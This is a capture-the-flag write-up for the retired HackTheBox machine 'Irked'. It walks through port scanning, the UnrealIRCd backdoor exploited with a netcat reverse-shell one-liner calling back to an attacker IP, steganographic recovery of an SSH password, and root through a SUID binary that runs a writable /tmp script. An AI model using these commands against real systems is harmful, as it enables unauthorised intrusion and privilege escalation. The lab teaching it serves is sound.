HackTheBox - Irked
OS | Difficulty | IP Address | Status |
---|---|---|---|
Linux | Easy | 10.10.10.117 | Retired |
This was classified as an easy machine by MrAgent on HackTheBox that is running a webpage containing an image and also running an Internet Relay Chat (IRC) application that contains a remote code execution vulnerability which we will analyze and exploit to gain a foothold on the box. For the privilege escalation part, we will find a setuid binary, since the SUID bit is set for root; we will abuse this binary and get root.
Phase 1 - Enumeration
Nmap
As usual, we start off with an nmap to identify open ports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36095/tcp6 status
| 100024 1 40049/udp6 status
| 100024 1 44079/udp status
|_ 100024 1 53133/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Not much to enumerate at, so let’s run a full port scan, too.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind rpcbind 2-4 (RPC #100000)
6697/tcp open ircs-u UnrealIRCd
8067/tcp open infi-async UnrealIRCd
65534/tcp open irc UnrealIRCd
We see a Internet Relay Chat port on 6697 which application name as UnrealIRCd.
Port 80
When we go to the webpage, we only find an image:
Nothing but a note stating “IRC is almost working” in the source code.
Phase 2 - Exploitation
UnrealIRC (RCE)
Nmap identified the IRC application as UnrealIRC, looking through ExploitDB’s command line tool searchsploit, we find an exploit for UnrealIRC 3.2.8.1:
┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ searchsploit UnrealIRC
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
Since we are doing things manually, we will skip the Metasploit version of the exploit and just look at the source code to understand how it is exploited.
def exploit
connect
print_status("Connected to #{rhost}:#{rport}...")
banner = sock.get_once(-1, 30)
banner.to_s.split("\n").each do |line|
print_line(" #{line}")
end
print_status("Sending backdoor command...")
sock.put("AB;" + payload.encoded + "\n")
handler
disconnect
end
It looks like the exploit is to connect to UnrealIRC and then send “AB;” with payload after.
Shell
We will connect to the IRC application through netcat and send our reverse shell.
┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ nc 10.10.10.117 6697
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 443 >/tmp/f
:irked.htb 451 AB; :You have not registered
And we get a shell as ircd:
┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ nc -lnvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.117.
Ncat: Connection from 10.10.10.117:40718.
bash: cannot set terminal process group (634): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
From ircd to djmardov
We can find user.txt, but I can’t read it:
ircd@irked:/home/djmardov/Documents$ cat user.txt
cat: user.txt: Permission denied
In that same directory, there’s a hidden .backup file:
ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 04:40 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
The note along with the password is hinting at steganography.
Steganography
Steganography is the practice of hiding a secret message in something that hiding in plain sight, like an image. When we opened the webpage on port 80, there wasn’t anything but an image. Let’s download that image, and extract it using the password found:
┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ wget 10.10.10.117/irked.jpg
--2019-04-04 08:56:51-- http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’
irked.jpg 100%[========================================>] 33.88K 137KB/s in 0.2s
2019-04-04 08:56:52 (137 KB/s) - ‘irked.jpg’ saved [34697/34697]
┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ cat pass.txt
Kab6h+m+bbp2J:HG
And we got the backup password of another user, let’s try to SSH into the machine:
┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 4 07:11:52 2019 from 10.10.14.7
djmardov@irked:~$
And we get in as djmardov and we can read the user flag.
Phase 3 - Privilege Escalation
SUID Path
When we run a find command to look for setuid binaries, we find one that sticks out:
djmardov@irked:~$ find / -perm /4000 2>/dev/null
...[snip]...
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
Running the binary we get a path to a file that is ‘not found’
djmardov@irked:/dev/shm$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-04-03 06:34 (:0)
djmardov pts/2 2019-04-04 09:01 (10.10.14.14)
sh: 1: /tmp/listusers: not found
So let’s create the file which the viewuser binary is looking for and add a shell.
djmardov@irked:~$ echo sh > /tmp/listusers
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2018-11-20 11:57 (:0)
djmardov pts/0 2018-11-20 11:58 (10.10.14.7)
djmardov pts/1 2018-11-20 12:36 (10.10.14.7)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
And we are root!
Post a Comment